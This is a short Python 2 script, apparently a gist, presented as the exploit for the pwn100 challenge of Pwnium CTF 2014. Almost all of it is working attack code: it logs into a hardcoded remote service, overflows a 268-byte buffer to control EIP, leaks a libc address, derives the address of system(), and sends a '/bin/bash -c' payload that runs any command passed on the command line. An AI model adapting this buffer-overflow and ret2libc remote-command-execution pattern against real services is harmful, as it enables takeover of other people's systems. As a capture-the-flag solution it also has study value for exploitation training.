exploit for pwn100 of Pwnium CTF2014

gistfile1.py

import socket
import struct
import sys

#HOST = "192.168.69.71"
HOST = "41.231.53.42"
PORT = 8282

def _s(i):
    return struct.pack("<I", i)

def _u(i):
    return struct.unpack("<I", i)[0]

def init():
    s = socket.socket()
    s.connect((HOST, PORT))

    s.recv(1024)
    s.send("user\n")

    s.recv(1024)
    s.send("user\n")

    if "user@user$" not in s.recv(1024):
        print "prompt failed"
        s.close()
        exit(1)
    return s


def leak_memory():
    s = init()
    eip = _s(0x08048B2E) ## before send(buf)
    data = "A"*268 + eip + "\xcc"*3
    s.send(data)
    dump = s.recv(1024)
    s.close()
    return dump


def pwn(sys_addr, cmd):
    s = init()
    eip = _s(sys_addr)
    payload = "/bin/bash -c '%s' >&4" % cmd
    data = payload + "\x0a"*(268-len(payload)) + eip + "\xcc"*3
    s.send(data)
    data = s.recv(1024)
    return data

data = leak_memory()
addr = _u(data[0x190:0x194])
print "leak libc addr is at %x" % addr
libc_base = addr - 1824751
print "libc base is at %x" % libc_base
system_addr = libc_base + 167824
print "system() is at %x" % system_addr

print "executing '%s'" % sys.argv[1]
print pwn(system_addr, sys.argv[1])